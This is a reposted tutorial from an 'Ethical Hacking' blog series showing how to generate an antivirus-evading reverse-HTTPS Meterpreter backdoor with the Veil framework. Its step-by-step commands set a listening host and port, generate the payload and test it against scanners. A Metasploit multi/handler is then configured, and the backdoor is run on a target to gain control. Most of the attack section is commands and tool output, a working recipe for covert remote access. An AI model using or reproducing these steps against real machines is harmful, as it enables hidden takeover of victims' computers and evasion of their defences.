Ethical Hacking - GAINING ACCESS(17)

时间：2020-01-29 15:54:47 阅读：78 评论：0 收藏：0 [点我收藏+]

标签：access col pid ogr module let asp handler class

CLIENT SIDE ATTACKS - Backdooring exe‘ s

Download an executable file first.

VEIL - FRAMEWORK

A backdoor is a file that gives us full control over the machine that it gets executed on.

Backdoors can be caught by Anti-Virus programs.

Veil is a framework for generating Undetectable backdoors.

1. Run veil

veil

技术图片

Select tool 1 - Evasion.

技术图片

2. List payloads and Select one

Veil/Evasion>: list
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:

    1)    autoit/shellcode_inject/flat.py

    2)    auxiliary/coldwar_wrapper.py
    3)    auxiliary/macro_converter.py
    4)    auxiliary/pyinstaller_wrapper.py

    5)    c/meterpreter/rev_http.py
    6)    c/meterpreter/rev_http_service.py
    7)    c/meterpreter/rev_tcp.py
    8)    c/meterpreter/rev_tcp_service.py

    9)    cs/meterpreter/rev_http.py
    10)    cs/meterpreter/rev_https.py
    11)    cs/meterpreter/rev_tcp.py
    12)    cs/shellcode_inject/base64.py
    13)    cs/shellcode_inject/virtual.py

    14)    go/meterpreter/rev_http.py
    15)    go/meterpreter/rev_https.py
    16)    go/meterpreter/rev_tcp.py
    17)    go/shellcode_inject/virtual.py

    18)    lua/shellcode_inject/flat.py

    19)    perl/shellcode_inject/flat.py

    20)    powershell/meterpreter/rev_http.py
    21)    powershell/meterpreter/rev_https.py
    22)    powershell/meterpreter/rev_tcp.py
    23)    powershell/shellcode_inject/psexec_virtual.py
    24)    powershell/shellcode_inject/virtual.py

    25)    python/meterpreter/bind_tcp.py
    26)    python/meterpreter/rev_http.py
    27)    python/meterpreter/rev_https.py
    28)    python/meterpreter/rev_tcp.py
    29)    python/shellcode_inject/aes_encrypt.py
    30)    python/shellcode_inject/arc_encrypt.py
    31)    python/shellcode_inject/base64_substitution.py
    32)    python/shellcode_inject/des_encrypt.py
    33)    python/shellcode_inject/flat.py
    34)    python/shellcode_inject/letter_substitution.py
    35)    python/shellcode_inject/pidinject.py
    36)    python/shellcode_inject/stallion.py

    37)    ruby/meterpreter/rev_http.py
    38)    ruby/meterpreter/rev_https.py
    39)    ruby/meterpreter/rev_tcp.py
    40)    ruby/shellcode_inject/base64.py
    41)    ruby/shellcode_inject/flat.py

3. Generating an undetectable backdoor using Veil 3

use go/meterpreter/rev_https.py

技术图片

set LHOST 10.0.0.15
set LPORT 8080
set PROCESSORS 1
set SLEEP 6

技术图片

4. Generate backdoor

generate

技术图片

Scan the file through https://nodistribute.com/.

技术图片

Run hander

1. Run Metasploit

msfconsole

2. Use the handler module.

use exploit/multi/handler

3. Set payload

set PAYLOAD [veil payload]

技术图片

4. Set IP

set LHOST [your IP]

5. Set port

set LPORT [veil port]

技术图片

6. exploit

exploit

技术图片

Run the backdoor file on the target machine sucessfully.

技术图片

Ethical Hacking - GAINING ACCESS(17)

标签：access col pid ogr module let asp handler class

原文地址：https://www.cnblogs.com/keepmoving1113/p/12240398.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行